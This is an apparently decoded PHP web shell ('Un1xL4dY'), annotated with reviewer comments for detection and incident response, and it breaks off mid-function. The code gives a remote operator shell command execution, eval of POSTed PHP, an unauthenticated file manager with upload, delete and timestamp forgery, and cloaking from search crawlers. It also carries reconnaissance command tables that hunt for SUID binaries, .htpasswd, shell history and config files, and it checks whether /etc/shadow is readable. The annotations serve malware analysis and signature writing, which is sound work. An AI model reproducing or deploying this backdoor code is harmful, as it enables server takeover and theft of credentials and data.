/* Decoded by unphp.net */
b'$color=" #F2A";
// NOTE(review): decoded sample of a PHP web shell; the functions further down implement a file manager,
// a command console, a PHP eval panel and a SQL client. The text is wrapped in an escaped byte-string
// literal and the HTML inside the echo strings appears to have been stripped, so this copy is material
// for analysis and signature work and is not runnable as printed.
// The settings below pick the default panel, the AJAX mode and the output charset.
$default_action=\'FilesMan\';
$default_use_ajax=true;
$default_charset=\'Windows-1251\';
// Cloaking: a request whose User-Agent contains one of the listed crawler names gets a bare 404 and the
// script stops. For hunting, a URL that answers 404 to crawler user agents and 200 to others is a lead.
if(!empty($_SERVER[\'HTTP_USER_AGENT\'])){$userAgents=array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");if(preg_match(\'/\'.implode(\'|\',$userAgents).\'/i\',$_SERVER[\'HTTP_USER_AGENT\'])){header(\'HTTP/1.0 404 Not Found\');exit;}}
// Starts a session, then switches off PHP error logging and the execution time limit; every call is
// silenced with @. For responders: the PHP error log will not record this script, so web server access
// logs (it reads its parameters from POST) are the main trace.
@session_start();@ini_set(\'error_log\',NULL);@ini_set(\'log_errors\',0);@ini_set(\'max_execution_time\',0);@set_time_limit(0);@set_magic_quotes_runtime(0);
// When magic quotes are on, recursively strip the added slashes from $_POST.
if(get_magic_quotes_gpc()){function Xstripslashes($array){return is_array($array)?array_map(\'Xstripslashes\',$array):stripslashes($array);}$_POST=Xstripslashes($_POST);}
// OS family is derived from the first three characters of PHP_OS.
$os=\'nix\';if(strtolower(substr(PHP_OS,0,3))==\'win\')$os=\'win\';
// Reads safe_mode and disable_functions; error reporting is turned off when safe mode is off.
$safe_mode=@ini_get(\'safe_mode\');if(!$safe_mode)error_reporting(0);
$disable_functions=@ini_get(\'disable_functions\');
// The working directory is taken from the request (POST c) when present; on Windows the path
// separators are normalised to forward slashes.
$home_cwd=@getcwd();if(isset($_POST[\'c\']))@chdir($_POST[\'c\']);$cwd=@getcwd();if($os==\'win\'){$home_cwd=str_replace("\","/",$home_cwd);$cwd=str_replace("\","/",$cwd);}
// Guarantee a trailing slash on $cwd; later code concatenates file names onto it directly.
if($cwd[strlen($cwd)-1]!=\'/\')$cwd.= \'/\';
// Per-host session flag for AJAX mode; the session key is md5(HTTP_HOST) followed by "ajax".
if(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']))$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']=(bool)$GLOBALS[\'default_use_ajax\'];
// Canned reconnaissance commands keyed by display label, one table per OS family. Nothing in this
// decoded copy reads $aliases; presumably the console markup that offered them was lost in extraction.
// The command strings (searches for SUID/SGID files, writable paths, configuration, password and
// shell-history files) are stable content for static signatures.
if($os==\'win\')
$aliases=array(
"List Directory"=>"dir",
"Find index.php in current dir"=>"dir /s /w /b index.php",
"Find *config*.php in current dir"=>"dir /s /w /b *config*.php",
"Show active connections"=>"netstat -an",
"Show running services"=>"net start",
"User accounts"=>"net user",
"Show computers"=>"net view",
"ARP Table"=>"arp -a",
"IP Configuration"=>"ipconfig /all"
);
else
$aliases=array(
"List dir"=>"ls -lha",
"list file attributes on a Linux second extended file system"=>"lsattr -va",
"show opened ports"=>"netstat -an | grep -i listen",
"process status"=>"ps aux",
"Find"=>"",
"find all suid files"=>"find / -type f -perm -04000 -ls",
"find suid files in current dir"=>"find.-type f -perm -04000 -ls",
"find all sgid files"=>"find / -type f -perm -02000 -ls",
"find sgid files in current dir"=>"find.-type f -perm -02000 -ls",
"find config.inc.php files"=>"find / -type f -name config.inc.php",
"find config* files"=>"find / -type f -name \"config*\"",
"find config* files in current dir"=>"find.-type f -name \"config*\"",
"find all writable folders and files"=>"find / -perm -2 -ls",
"find all writable folders and files in current dir"=>"find.-perm -2 -ls",
"find all service.pwd files"=>"find / -type f -name service.pwd",
"find service.pwd files in current dir"=>"find.-type f -name service.pwd",
"find all .htpasswd files"=>"find / -type f -name .htpasswd",
"find .htpasswd files in current dir"=>"find.-type f -name .htpasswd",
"find all .bash_history files"=>"find / -type f -name .bash_history",
"find .bash_history files in current dir"=>"find.-type f -name .bash_history",
"find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir"=>"find.-type f -name .fetchmailrc",
"Locate"=>"",
"locate httpd.conf files"=>"locate httpd.conf",
"locate vhosts.conf files"=>"locate vhosts.conf",
"locate proftpd.conf files"=>"locate proftpd.conf",
"locate psybnc.conf files"=>"locate psybnc.conf",
"locate my.conf files"=>"locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files"=>"locate cfg.php",
"locate conf.php files"=>"locate conf.php",
"locate config.dat files"=>"locate config.dat",
"locate config.php files"=>"locate config.php",
"locate config.inc files"=>"locate config.inc",
"locate config.inc.php"=>"locate config.inc.php",
"locate config.default.php files"=>"locate config.default.php",
"locate config* files "=>"locate config",
"locate .conf files"=>"locate \'.conf\'",
"locate .pwd files"=>"locate \'.pwd\'",
"locate .sql files"=>"locate \'.sql\'",
"locate .htpasswd files"=>"locate \'.htpasswd\'",
"locate .bash_history files"=>"locate \'.bash_history\'",
"locate .mysql_history files"=>"locate \'.mysql_history\'",
"locate .fetchmailrc files"=>"locate \'.fetchmailrc\'",
"locate backup files"=>"locate backup",
"locate dump files"=>"locate dump",
"locate priv files"=>"locate priv"
);
// XHeader: prints the page header and a host fingerprint (uname, effective user and group, PHP version,
// safe-mode state, disk usage, current directory, server and client IP). The echo strings in this copy
// have lost their markup, so only the text fragments remain. The literal "Un1xL4dY" in the title line is
// fixed text and usable as a static signature string.
function XHeader(){
// Fall back to the configured charset when the request carries none.
if(empty($_POST[\'charset\']))
$_POST[\'charset\']=$GLOBALS[\'default_charset\'];
global $color;
echo "
$_SERVER[HTTP_HOST] - Un1xL4dY
";
// Disk figures for the current directory; total is forced to at least 1 to avoid division by zero below.
$freeSpace=@diskfreespace($GLOBALS[\'cwd\']);
$totalSpace=@disk_total_space($GLOBALS[\'cwd\']);
$totalSpace=$totalSpace?$totalSpace:1;
$release=@php_uname(\'r\');
$kernel=@php_uname(\'s\');
// Builds a search URL on exploit-db.com from the kernel name and a prefix of the release string.
// $explink is not referenced by the echo strings that survive in this copy.
$explink=\'http://exploit-db.com/list.php?description=\';
if(strpos(\'Linux\',$kernel)!==false)
$explink .= urlencode(\'Linux Kernel \'.substr($release,0,6));
else
$explink .= urlencode($kernel.\' \'.substr($release,0,3));
// Identity of the PHP process: POSIX effective uid/gid when available, otherwise the script owner ids.
if(!function_exists(\'posix_getegid\')){
$user=@get_current_user();
$uid=@getmyuid();
$gid=@getmygid();
$group="?";
}else {
$uid=@posix_getpwuid(posix_geteuid());
$gid=@posix_getgrgid(posix_getegid());
$user=$uid[\'name\'];
$uid=$uid[\'uid\'];
$group=$gid[\'name\'];
$gid=$gid[\'gid\'];
}
// Breadcrumb text built from the components of the current directory.
$cwd_links=\'\';
$path=explode("/",$GLOBALS[\'cwd\']);
$n=count($path);
for($i=0; $i<$n-1; $i++){
$cwd_links .= "
".$path[$i]."/ ";
}
$charsets=array(\'UTF-8\',\'Windows-1251\',\'KOI8-R\',\'KOI8-U\',\'cp866\');
$opt_charsets=\'\';
foreach($charsets as $item)
$opt_charsets .= \'
\'.$item.\' \';
// Menu label => action name; the dispatcher at the end of the file calls the function named action<name>.
$m=array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\');
// NOTE(review): the Logout entry depends on a global auth_pass, but no auth_pass assignment and no
// password check is visible in this copy - confirm against the original sample.
if(!empty($GLOBALS[\'auth_pass\']))
$m[\'Logout\']=\'Logout\';
$m[\'Self remove\']=\'SelfRemove\';
$menu=\'\';
foreach($m as $k=>$v)
$menu .= \'
[ \'.$k.\' ] \';
// On Windows, probe drive letters c through z and list the ones that exist.
$drives="";
if($GLOBALS[\'os\']==\'win\'){
foreach(range(\'c\',\'z\') as $drive)
if(is_dir($drive.\':\\'))
$drives .= \'
[ \'.$drive.\' ] \';
}
// Final echo: the fingerprint row. REMOTE_ADDR is printed back, so the page shows the operator address.
echo \'
Uname: User: Php: Hdd: Cwd:\'.($GLOBALS[\'os\']==\'win\'?\' Drives:\':\'\').\' \'
.\'\'.substr(@php_uname(),0,120).\' [exploit-db.com] \'.$uid.\' (\'.$user.\') Group: \'.$gid.\' (\'.$group.\') \'.@phpversion().\' Safe mode: \'.($GLOBALS[\'safe_mode\']?\'ON \':\'OFF \')
.\' [ phpinfo ] Datetime: \'.date(\'Y-m-d H:i:s\').\' \'.XViewSize($totalSpace).\' Free: \'.XViewSize($freeSpace).\' (\'. (int) ($freeSpace/$totalSpace*100).\'%) \'.$cwd_links.\' \'. XPermsColor($GLOBALS[\'cwd\']).\' [ home ] \'.$drives.\' \'
.\'\'.$opt_charsets.\' Server IP: \'.@$_SERVER["SERVER_ADDR"].\'Client IP: \'.$_SERVER[\'REMOTE_ADDR\'].\'
\'
.\'
\';
}
// XFooter: prints the page footer. $is_writable (whether the current directory is writable) is computed
// but the echo string that survives in this copy does not use it; presumably the footer markup that
// printed it was stripped during extraction.
function XFooter(){
$is_writable=is_writable($GLOBALS[\'cwd\'])?" (Writeable) ":" (Not writable) ";
echo "
";
}
// Fallback stubs: when posix_getpwuid / posix_getgrgid do not exist and are not named in
// disable_functions, define versions that return false so later calls do not fail.
if(!function_exists("posix_getpwuid")&&(strpos($GLOBALS[\'disable_functions\'],\'posix_getpwuid\')===false)){
function posix_getpwuid($p){return false;}}
if(!function_exists("posix_getgrgid")&&(strpos($GLOBALS[\'disable_functions\'],\'posix_getgrgid\')===false)){
function posix_getgrgid($p){return false;}}
// XEx: runs the shell command string $in and returns its output as a string.
// It uses the first available primitive in this order: exec, passthru, system, shell_exec, popen.
// Every command feature in this file goes through here, so the host-side observable is the web server
// account spawning shell child processes. Hardening note: restricting all five primitives (for example
// through disable_functions) removes every path this function has.
function XEx($in){
$out=\'\';
if(function_exists(\'exec\')){
// exec fills $out with an array of lines, joined back into one string.
@exec($in,$out);
$out=@join("
",$out);
}elseif(function_exists(\'passthru\')){
// passthru and system write straight to output, so the output buffer is used to capture it.
ob_start();
@passthru($in);
$out=ob_get_clean();
}elseif(function_exists(\'system\')){
ob_start();
@system($in);
$out=ob_get_clean();
}elseif(function_exists(\'shell_exec\')){
$out=shell_exec($in);
}elseif(is_resource($f=@popen($in,"r"))){
// Last resort: read the process pipe in 1024-byte chunks.
$out="";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
// XViewSize: formats a byte count $s as text. Values of 1 GiB, 1 MiB or 1 KiB and above are divided
// down and printed with two decimals plus the GB / MB / KB suffix; smaller values are printed with " B".
function XViewSize($s){
if($s >= 1073741824)
return sprintf(\'%1.2f\',$s / 1073741824). \' GB\';
elseif($s >= 1048576)
return sprintf(\'%1.2f\',$s / 1048576).\' MB\';
elseif($s >= 1024)
return sprintf(\'%1.2f\',$s / 1024).\' KB\';
else
return $s.\' B\';
}
// XPerms: renders the mode integer $p (as returned by fileperms) as a ten-character ls-style string.
// The first character comes from the file-type bits (s, l, -, b, d, c, p, or u when none match);
// the next nine are the owner, group and other rwx triplets.
function XPerms($p){
if(($p & 0xC000)==0xC000)$i=\'s\';
elseif(($p & 0xA000)==0xA000)$i=\'l\';
elseif(($p & 0x8000)==0x8000)$i=\'-\';
elseif(($p & 0x6000)==0x6000)$i=\'b\';
elseif(($p & 0x4000)==0x4000)$i=\'d\';
elseif(($p & 0x2000)==0x2000)$i=\'c\';
elseif(($p & 0x1000)==0x1000)$i=\'p\';
else $i=\'u\';
// Owner triplet; bit 0x0800 turns the execute slot into s (with x) or S (without x).
$i .= (($p & 0x0100)?\'r\':\'-\');
$i .= (($p & 0x0080)?\'w\':\'-\');
$i .= (($p & 0x0040)?(($p & 0x0800)?\'s\':\'x\'):(($p & 0x0800)?\'S\':\'-\'));
// Group triplet; bit 0x0400 plays the same role for the group execute slot.
$i .= (($p & 0x0020)?\'r\':\'-\');
$i .= (($p & 0x0010)?\'w\':\'-\');
$i .= (($p & 0x0008)?(($p & 0x0400)?\'s\':\'x\'):(($p & 0x0400)?\'S\':\'-\'));
// Other triplet; bit 0x0200 turns the execute slot into t or T.
$i .= (($p & 0x0004)?\'r\':\'-\');
$i .= (($p & 0x0002)?\'w\':\'-\');
$i .= (($p & 0x0001)?(($p & 0x0200)?\'t\':\'x\'):(($p & 0x0200)?\'T\':\'-\'));
return $i;
}
// XPermsColor: returns the XPerms string for path $f, choosing a branch by whether the path is
// unreadable, read-only or writable for the PHP process. The three branches return the same text in
// this copy; presumably they differed only in colour markup that was stripped during extraction.
function XPermsColor($f){
if(!@is_readable($f))
return \'\'.XPerms(@fileperms($f)).\' \';
elseif(!@is_writable($f))
return \'\'.XPerms(@fileperms($f)).\' \';
else
return \'\'.XPerms(@fileperms($f)).\' \';
}
// Fallback for PHP builds without scandir: collect directory entries with opendir/readdir.
// The handle is not closed and $files is not initialised, so an empty directory returns null.
if(!function_exists("scandir")){
function scandir($dir){
$dh= opendir($dir);
while (false!==($filename=readdir($dh)))
$files[]=$filename;
return $files;
}
}
// XWhich: looks up program name $p by running "which" through XEx; $p is appended to the command
// unquoted. Returns the output when it is non-empty, otherwise false.
function XWhich($p){
$path=XEx(\'which \'.$p);
if(!empty($path))
return $path;
return false;
}
// actionSecInfo: the host survey panel. It prints server software, loaded Apache modules, PHP
// restrictions (disable_functions, open_basedir, safe-mode directories), database client support and,
// per OS family, account and system details. Everything is read-only, but it tells the operator which
// restrictions and defensive tools are present on the host.
function actionSecInfo(){
XHeader();
echo \'Server security information \';
// Nested helper: prints one "name: value" row and skips empty values. It is declared inside the
// function body, so it only exists after actionSecInfo has been entered.
function XSecParam($n,$v){
$v=trim($v);
if($v){
echo \'
\'.$n.\': \';
if(strpos($v,"
") === false)
echo $v.\'
\';
else
echo \'
\'.$v.\' \';
}
}
XSecParam(\'Server software\',@getenv(\'SERVER_SOFTWARE\'));
if(function_exists(\'apache_get_modules\'))
XSecParam(\'Loaded Apache modules\',implode(\',\',apache_get_modules()));
XSecParam(\'Disabled PHP Functions\',$GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');
XSecParam(\'Open base dir\',@ini_get(\'open_basedir\'));
XSecParam(\'Safe mode exec dir\',@ini_get(\'safe_mode_exec_dir\'));
XSecParam(\'Safe mode include dir\',@ini_get(\'safe_mode_include_dir\'));
XSecParam(\'cURL support\',function_exists(\'curl_version\')?\'enabled\':\'no\');
// Database client support is inferred from which connect functions exist.
$temp=array();
if(function_exists(\'mysql_get_client_info\'))
$temp[]="MySql (".mysql_get_client_info().")";
if(function_exists(\'mssql_connect\'))
$temp[]="MSSQL";
if(function_exists(\'pg_connect\'))
$temp[]="PostgreSQL";
if(function_exists(\'oci_connect\'))
$temp[]="Oracle";
XSecParam(\'Supported databases\',implode(\',\',$temp));
echo \'
\';
// Unix branch: reports whether /etc/passwd and /etc/shadow are readable by the PHP process and
// prints the kernel version and distribution banner.
if($GLOBALS[\'os\']==\'nix\'){
XSecParam(\'Readable /etc/passwd\',@is_readable(\'/etc/passwd\')?"yes
[view] ":\'no\');
XSecParam(\'Readable /etc/shadow\',@is_readable(\'/etc/shadow\')?"yes
[view] ":\'no\');
XSecParam(\'OS version\',@file_get_contents(\'/proc/version\'));
XSecParam(\'Distr name\',@file_get_contents(\'/etc/issue.net\'));
if(!$GLOBALS[\'safe_mode\']){
// Three name lists, each probed one name at a time with XWhich: build tools and interpreters,
// security products (antivirus, rootkit checkers, IDS, firewall and log monitors), and download
// tools. For defenders, a burst of "which" lookups for these names from the web server account
// is a recognisable pattern in process telemetry.
$userful=array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');
$danger=array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');
$downloaders=array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');
echo \'
\';
$temp=array();
foreach ($userful as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam(\'Userful\',implode(\',\',$temp));
$temp=array();
foreach ($danger as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam(\'Danger\',implode(\',\',$temp));
$temp=array();
foreach ($downloaders as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam(\'Downloaders\',implode(\',\',$temp));
echo \'
\';
XSecParam(\'HDD space\',XEx(\'df -h\'));
XSecParam(\'Hosts\',@file_get_contents(\'/etc/hosts\'));
}
}else {
// Windows branch: OS version and account information through shell commands.
XSecParam(\'OS Version\',XEx(\'ver\'));
XSecParam(\'Account Settings\',XEx(\'net accounts\'));
XSecParam(\'User Accounts\',XEx(\'net user\'));
}
echo \'
\';
XFooter();
}
// actionPhp: the PHP execution panel. It passes request-supplied code (POST p1) to eval, in AJAX mode
// and in full-page mode, and can print phpinfo when p2 is "info". No authentication check is visible
// in this function. For static detection, eval applied directly to a $_POST element is a
// high-confidence indicator.
function actionPhp(){
// AJAX mode: evaluate p1, capture the output, and send it back as a script fragment prefixed by its
// length; the script exits here.
if(isset($_POST[\'ajax\'])){
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']=true;
ob_start();
eval($_POST[\'p1\']);
$temp="document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"
\\' ")."\';
";
echo strlen($temp),"
",$temp;
exit;
}
XHeader();
// phpinfo mode: capture phpinfo output and rewrite its style rules.
// NOTE(review): the str_replace call below is truncated in this copy (markup stripped by extraction).
if(isset($_POST[\'p2\'])&&($_POST[\'p2\']==\'info\')){
echo \'PHP info \';
ob_start();
phpinfo();
$tmp=ob_get_clean();
$tmp=preg_replace(\'!(body|a:\w+|body,td,th,h1,h2){.*}!msiU\',\'\',$tmp);
$tmp=preg_replace(\'!td,th {(.*)}!msiU\',\'.e,.v,.h,.h th {$1}\',$tmp);
echo str_replace(\'
\';
}
if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']=false;
echo \'Execution PHP-code \';
// Full-page mode: evaluate p1 and print the captured output HTML-escaped.
if(!empty($_POST[\'p1\'])){
ob_start();
eval($_POST[\'p1\']);
echo htmlspecialchars(ob_get_clean());
}
echo \' \';
XFooter();
}
// actionFilesMan: the file manager panel. POST p1 selects an operation (upload, mkdir, delete, paste);
// any other non-empty p1 stores a selection in the session for a later paste. After the operation the
// directory listing is built and printed. All paths come from the request or the session and are
// bounded only by the permissions of the PHP process. No authentication check is visible here.
function actionFilesMan(){
XHeader();
echo \'File manager \';
if(!empty($_POST[\'p1\'])){
switch($_POST[\'p1\']){
// Upload: the file is stored in the current directory under the name supplied by the client.
case \'uploadFile\':
if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'],$_FILES[\'f\'][\'name\']))
echo "Can\'t upload file!";
break;
case \'mkdir\':
if(!@mkdir($_POST[\'p2\']))
echo "Can\'t create new dir";
break;
// Delete: each entry of POST f is URL-decoded and removed; directories are removed recursively
// by the nested deleteDir helper.
case \'delete\':
function deleteDir($path){
$path=(substr($path,-1)==\'/\')?$path:$path.\'/\';
$dh= opendir($path);
while (($item=readdir($dh))!==false){
$item=$path.$item;
if((basename($item)=="..")||(basename($item)=="."))
continue;
$type=filetype($item);
if($type=="dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST[\'f\']))
foreach($_POST[\'f\'] as $f){
if($f==\'..\')
continue;
$f=urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
// Paste: applies the action stored in the session (act) to the stored selection (f) from the
// stored source directory (c), with the current directory as the destination.
case \'paste\':
if($_SESSION[\'act\']==\'copy\'){
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h=@opendir($c.$s);
while (($f=@readdir($h))!==false)
if(($f!=".") and ($f!=".."))
copy_paste($c.$s.\'/\',$f,$d.$s.\'/\');
}elseif(is_file($c.$s))
@copy($c.$s,$d.$s);
}
foreach($_SESSION[\'f\'] as $f)
copy_paste($_SESSION[\'c\'],$f,$GLOBALS[\'cwd\']);
}elseif($_SESSION[\'act\']==\'move\'){
// move_paste is declared here, but the loop below performs the move with rename.
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h=@opendir($c.$s);
while (($f=@readdir($h))!==false)
if(($f!=".") and ($f!=".."))
copy_paste($c.$s.\'/\',$f,$d.$s.\'/\');
}elseif(@is_file($c.$s))
@copy($c.$s,$d.$s);
}
foreach($_SESSION[\'f\'] as $f)
@rename($_SESSION[\'c\'].$f,$GLOBALS[\'cwd\'].$f);
}elseif($_SESSION[\'act\']==\'zip\'){
// Zip: packs the selection into the archive named by POST p2. Archives appearing under the
// web root are a staging artefact worth checking for during triage.
if(class_exists(\'ZipArchive\')){
$zip=new ZipArchive();
if($zip->open($_POST[\'p2\'],1)){
chdir($_SESSION[\'c\']);
foreach($_SESSION[\'f\'] as $f){
if($f==\'..\')
continue;
if(@is_file($_SESSION[\'c\'].$f))
$zip->addFile($_SESSION[\'c\'].$f,$f);
elseif(@is_dir($_SESSION[\'c\'].$f)){
$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\'));
foreach ($iterator as $key=>$value){
$zip->addFile(realpath($key),$key);
}
}
}
chdir($GLOBALS[\'cwd\']);
$zip->close();
}
}
}elseif($_SESSION[\'act\']==\'unzip\'){
// Unzip: extracts each selected archive into the current directory.
if(class_exists(\'ZipArchive\')){
$zip=new ZipArchive();
foreach($_SESSION[\'f\'] as $f){
if($zip->open($_SESSION[\'c\'].$f)){
$zip->extractTo($GLOBALS[\'cwd\']);
$zip->close();
}
}
}
}elseif($_SESSION[\'act\']==\'tar\'){
// Tar: shells out to tar through XEx; archive name and members are passed through escapeshellarg.
chdir($_SESSION[\'c\']);
$_SESSION[\'f\']=array_map(\'escapeshellarg\',$_SESSION[\'f\']);
XEx(\'tar cfzv \'.escapeshellarg($_POST[\'p2\']).\' \'.implode(\' \',$_SESSION[\'f\']));
chdir($GLOBALS[\'cwd\']);
}
unset($_SESSION[\'f\']);
break;
// Any other p1 value: remember the action, the URL-decoded selection and the source directory in
// the session for a later paste.
default:
if(!empty($_POST[\'p1\'])){
$_SESSION[\'act\']=@$_POST[\'p1\'];
$_SESSION[\'f\']=@$_POST[\'f\'];
foreach($_SESSION[\'f\'] as $k=>$f)
$_SESSION[\'f\'][$k]=urldecode($f);
$_SESSION[\'c\']=@$_POST[\'c\'];
}
break;
}
}
// Listing: read the requested directory (POST c, else the current directory).
$dirContent=@scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);
if($dirContent === false){echo \'Can\'t open this folder!\';XFooter(); return; }
// Sort column and direction default to name ascending; a p1 value of the form s_<column>_<digit>
// overrides them.
global $sort;
$sort=array(\'name\',1);
if(!empty($_POST[\'p1\'])){
if(preg_match(\'!s_([A-z]+)_(\d{1})!\',$_POST[\'p1\'],$match))
$sort=array($match[1],(int)$match[2]);
}
echo "
Name Size Modify Owner/Group Permissions Actions ";
// One record per entry: name, path, mtime, permission string, size, owner and group (name when
// resolvable, numeric id otherwise). Entries are split into files and directories/links.
$dirs=$files=array();
$n=count($dirContent);
for($i=0;$i<$n;$i++){
$ow=@posix_getpwuid(@fileowner($dirContent[$i]));
$gr=@posix_getgrgid(@filegroup($dirContent[$i]));
$tmp=array(\'name\'=>$dirContent[$i],
\'path\'=>$GLOBALS[\'cwd\'].$dirContent[$i],
\'modify\'=>date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])),
\'perms\'=>XPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]),
\'size\'=>@filesize($GLOBALS[\'cwd\'].$dirContent[$i]),
\'owner\'=>$ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),
\'group\'=>$gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i]))
$files[]=array_merge($tmp,array(\'type\'=>\'file\'));
elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i]))
$dirs[]=array_merge($tmp,array(\'type\'=>\'link\',\'link\'=>readlink($tmp[\'path\'])));
elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i]!="."))
$dirs[]=array_merge($tmp,array(\'type\'=>\'dir\'));
}
$GLOBALS[\'sort\']=$sort;
// Comparator for usort: case-insensitive string compare on the chosen column, numeric compare for
// size, with the sign flipped when the direction flag is 0.
function XCmp($a,$b){
if($GLOBALS[\'sort\'][0]!=\'size\')
return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]),strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);
else
return (($a[\'size\'] < $b[\'size\'])?-1:1)*($GLOBALS[\'sort\'][1]?1:-1);
}
usort($files,"XCmp");
usort($dirs,"XCmp");
$files=array_merge($dirs,$files);
$l=0;
// NOTE(review): the row echo below is damaged in this copy (its markup was stripped), so it is not
// valid PHP as printed.
foreach($files as $f){
echo \'\'.htmlspecialchars($f[\'name\']):\'g(\'FilesMan\',\'\'.$f[\'path\'].\'\');" title=\'.$f[\'link\'].\'>[ \'.htmlspecialchars($f[\'name\']).\' ] \').\' \'.(($f[\'type\']==\'file\')?XViewSize($f[\'size\']):$f[\'type\']).\' \'.$f[\'modify\'].\' \'.$f[\'owner\'].\'/\'.$f[\'group\'].\' \'.$f[\'perms\']
.\' R T \'.(($f[\'type\']==\'file\')?\' E D \':\'\').\' \';
$l=$l?0:1;
}
echo "
Copy Move Delete ";
if(class_exists(\'ZipArchive\'))
echo "Compress (zip) Uncompress (zip) ";
echo "Compress (tar.gz) ";
if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\']))
echo "Paste / Compress ";
echo " ";
if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])&&(($_SESSION[\'act\']==\'zip\')||($_SESSION[\'act\']==\'tar\')))
echo "file name: ";
echo " >\'>
";
XFooter();
}
// actionFilesTools: per-file operations on the path in POST p1 (URL-decoded first). POST p2 selects
// the mode: download, mkfile, view, highlight, chmod, edit, hexdump, rename or touch; p3 carries the
// mode argument. Two modes alter timestamps, which matters for incident timelines: "edit" restores the
// previous modification time after writing, and "touch" sets an arbitrary time.
function actionFilesTools(){
if(isset($_POST[\'p1\']))
$_POST[\'p1\']=urldecode($_POST[\'p1\']);
// Download: streams the file as an attachment with gzip output buffering, then exits.
if(@$_POST[\'p2\']==\'download\'){
if(@is_file($_POST[\'p1\'])&&@is_readable($_POST[\'p1\'])){
ob_start("ob_gzhandler",4096);
header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));
if(function_exists("mime_content_type")){
$type=@mime_content_type($_POST[\'p1\']);
header("Content-Type: ".$type);
}else
header("Content-Type: application/octet-stream");
$fp=@fopen($_POST[\'p1\'],"r");
if($fp){
while(!@feof($fp))
echo @fread($fp,1024);
fclose($fp);
}
}exit;
}
// Mkfile: creates an empty file when the path does not exist, then continues in edit mode.
if(@$_POST[\'p2\']==\'mkfile\'){
if(!file_exists($_POST[\'p1\'])){
$fp=@fopen($_POST[\'p1\'],\'w\');
if($fp){
$_POST[\'p2\']="edit";
fclose($fp);
}
}
}
XHeader();
echo \'File tools \';
if(!file_exists(@$_POST[\'p1\'])){
echo \'File not exists\';
XFooter();
return;
}
// Owner and group: names when they resolve, numeric ids otherwise.
$uid=@posix_getpwuid(@fileowner($_POST[\'p1\']));
if(!$uid){
$uid[\'name\']=@fileowner($_POST[\'p1\']);
$gid[\'name\']=@filegroup($_POST[\'p1\']);
}else $gid=@posix_getgrgid(@filegroup($_POST[\'p1\']));
echo \'
Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\'
Size: \'.(is_file($_POST[\'p1\'])?XViewSize(filesize($_POST[\'p1\'])):\'-\').\'
Permission: \'.XPermsColor($_POST[\'p1\']).\'
Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';
echo \'
Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\'
Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\'
Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'
\';
// Default mode is view; directories only get chmod, rename and touch in the mode list.
if(empty($_POST[\'p2\']))
$_POST[\'p2\']=\'view\';
if(is_file($_POST[\'p1\']))
$m=array(\'View\',\'Highlight\',\'Download\',\'Hexdump\',\'Edit\',\'Chmod\',\'Rename\',\'Touch\');
else
$m=array(\'Chmod\',\'Rename\',\'Touch\');
foreach($m as $v)
echo \'
\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ] \':$v).\' \';
echo \'
\';
switch($_POST[\'p2\']){
// View: prints the file HTML-escaped in 1024-byte chunks.
case \'view\':
echo \'
\';
$fp=@fopen($_POST[\'p1\'],\'r\');
if($fp){
